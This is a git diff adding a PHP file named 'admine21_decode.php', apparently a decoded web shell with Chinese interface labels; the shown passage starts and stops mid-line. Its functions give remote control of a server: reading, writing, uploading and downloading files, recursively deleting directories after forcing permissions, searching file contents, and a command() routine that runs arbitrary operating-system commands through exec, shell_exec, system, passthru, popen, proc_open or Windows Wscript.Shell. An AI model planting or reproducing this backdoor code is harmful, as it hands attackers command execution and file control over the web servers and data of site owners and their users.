diff --git a/php/admine21_decode.php b/php/admine21_decode.php
new file mode 100644
index 0000000..8695255
--- /dev/null
+++ b/php/admine21_decode.php
@@ -0,0 +1,994 @@
+ $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; }
+$myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__);
+$myfile = strpos($myfile,'eval()') ? array_shift(explode('(',$myfile)) : $myfile;
+define('THISDIR',strdir(dirname($myfile).'/'));
+define('ROOTDIR',strdir(strtr($myfile,array(strdir($_SERVER['PHP_SELF']) => '')).'/'));
+define('EXISTS_PHPINFO',getinfo() ? true : false);
+if(get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); }
+if(function_exists('mysql_close')) { $issql = 'MySql'; }
+if(function_exists('mssql_close')) $issql .= ' - MsSql';
+if(function_exists('oci_close')) $issql .= ' - Oracle';
+if(function_exists('sybase_close')) $issql .= ' - SyBase';
+if(function_exists('pg_close')) $issql .= ' - PostgreSql';
+$win = substr(PHP_OS,0,3) == 'WIN' ? true : false;
+$msg = VERSION;
+
+function filew($filename,$filedata,$filemode) {
+ if((!is_writable($filename)) && file_exists($filename)) { chmod($filename,0666); }
+ $handle = fopen($filename,$filemode);
+ $key = fputs($handle,$filedata);
+ fclose($handle);
+ return $key;
+}
+
+function filer($filename) {
+ $handle = fopen($filename,'r');
+ $filedata = fread($handle,filesize($filename));
+ fclose($handle);
+ return $filedata;
+}
+
+function fileu($filenamea,$filenameb) {
+ $key = move_uploaded_file($filenamea,$filenameb) ? true : false;
+ if(!$key) { $key = copy($filenamea,$filenameb) ? true : false; }
+ return $key;
+}
+
+function filed($filename) {
+ if(!file_exists($filename)) return false;
+ ob_end_clean();
+ $name = basename($filename);
+ $array = explode('.',$name);
+ header('Content-type: application/x-'.array_pop($array));
+ header('Content-Disposition: attachment; filename='.$name);
+ header('Content-Length: '.filesize($filename));
+ @readfile($filename);
+ exit;
+}
+
+function showdir($dir) {
+ $dir = strdir($dir.'/');
+ if(($handle = @opendir($dir)) == NULL) return false;
+ $array = array();
+ while(false !== ($name = readdir($handle))) {
+ if($name == '.' || $name == '..') continue;
+ $path = $dir.$name;
+ $name = strtr($name,array('\'' => '%27','"' => '%22'));
+ if(is_dir($path)) { $array['dir'][$path] = $name; }
+ else { $array['file'][$path] = $name; }
+ }
+ closedir($handle);
+ return $array;
+}
+
+function deltree($dir) {
+ $handle = @opendir($dir);
+ while(false !== ($name = @readdir($handle))) {
+ if($name == '.' || $name == '..') continue;
+ $path = $dir.$name;
+ @chmod($path,0777);
+ if(is_dir($path)) { deltree($path.'/'); }
+ else { @unlink($path); }
+ }
+ @closedir($handle);
+ return @rmdir($dir);
+}
+
+function size($bytes) {
+ if($bytes < 1024) return $bytes.' B';
+ $array = array('B','K','M','G','T');
+ $floor = floor(log($bytes) / log(1024));
+ return sprintf('%.2f '.$array[$floor],($bytes/pow(1024,floor($floor))));
+}
+
+function find($array,$string) {
+ foreach($array as $key) { if(stristr($string,$key)) return true; }
+ return false;
+}
+
+function scanfile($dir,$key,$inc,$fit,$tye,$chr,$ran,$now) {
+ if(($handle = @opendir($dir)) == NULL) return false;
+ while(false !== ($name = readdir($handle))) {
+ if($name == '.' || $name == '..') continue;
+ $path = $dir.$name;
+ if(is_dir($path)) { if($fit && in_array($name,$fit)) continue; if($ran == 0 && is_readable($path)) scanfile($path.'/',$key,$inc,$fit,$tye,$chr,$ran,$now); }
+ else {
+ if($inc && (!find($inc,$name))) continue;
+ $code = $tye ? filer($path) : $name;
+ $find = $chr ? stristr($code,$key) : (strpos(size(filesize($path)),'M') ? false : (strpos($code,$key) > -1));
+ if($find) {
+ $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
+ echo '编辑 '.$path.'
';
+ flush(); ob_flush();
+ }
+ unset($code);
+ }
+ }
+ closedir($handle);
+ return true;
+}
+
+function antivirus($dir,$exs,$matches,$now) {
+ if(($handle = @opendir($dir)) == NULL) return false;
+ while(false !== ($name = readdir($handle))) {
+ if($name == '.' || $name == '..') continue;
+ $path = $dir.$name;
+ if(is_dir($path)) { if(is_readable($path)) antivirus($path.'/',$exs,$matches,$now); }
+ else {
+ $iskill = NULL;
+ foreach($exs as $key => $ex) { if(find(explode('|',$ex),$name)) { $iskill = $key; break; } }
+ if(strpos(size(filesize($path)),'M')) continue;
+ if($iskill) {
+ $code = filer($path);
+ foreach($matches[$iskill] as $matche) {
+ $array = array();
+ preg_match($matche,$code,$array);
+ if(strpos($array[0],'$this->') || strpos($array[0],'[$vars[')) continue;
+ $len = strlen($array[0]);
+ if($len > 6 && $len < 200) {
+ $file = strtr($path,array($now => '','\'' => '%27','"' => '%22'));
+ echo '特征 编辑 '.$path.'
';
+ flush(); ob_flush(); break;
+ }
+ }
+ unset($code,$array);
+ }
+ }
+ }
+ closedir($handle);
+ return true;
+}
+
+function command($cmd,$cwd,$com = false) {
+ $iswin = substr(PHP_OS,0,3) == 'WIN' ? true : false; $res = $msg = '';
+ if($cwd == 'com' || $com) {
+ if($iswin && class_exists('COM')) {
+ $wscript = new COM('Wscript.Shell');
+ $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c '.$cmd);
+ $stdout = $exec->StdOut();
+ $res = $stdout->ReadAll();
+ $msg = 'Wscript.Shell';
+ }
+ } else {
+ chdir($cwd); $cwd = getcwd();
+ if(function_exists('exec')) { @exec ($cmd,$res); $res = join("\n",$res); $msg = 'exec'; }
+ elseif(function_exists('shell_exec')) { $res = @shell_exec ($cmd); $msg = 'shell_exec'; }
+ elseif(function_exists('system')) { ob_start(); @system ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'system'; }
+ elseif(function_exists('passthru')) { ob_start(); @passthru ($cmd); $res = ob_get_contents(); ob_end_clean(); $msg = 'passthru'; }
+ elseif(function_exists('popen')) { $fp = @popen ($cmd,'r'); if($fp) { while(!feof($fp)) { $res .= fread($fp,1024); } } @pclose($fp); $msg = 'popen'; }
+ elseif(function_exists('proc_open')) {
+ $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
+ $des = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
+ $process = @proc_open ($cmd,$des,$pipes,$cwd,$env);
+ if(is_resource($process)) { fwrite($pipes[0],$cmd); fclose($pipes[0]); $res .= stream_get_contents($pipes[1]); fclose($pipes[1]); $res .= stream_get_contents($pipes[2]); fclose($pipes[2]); }
+ @proc_close($process);
+ $msg = 'proc_open';
+ }
+ }
+ $msg = $res == '' ? '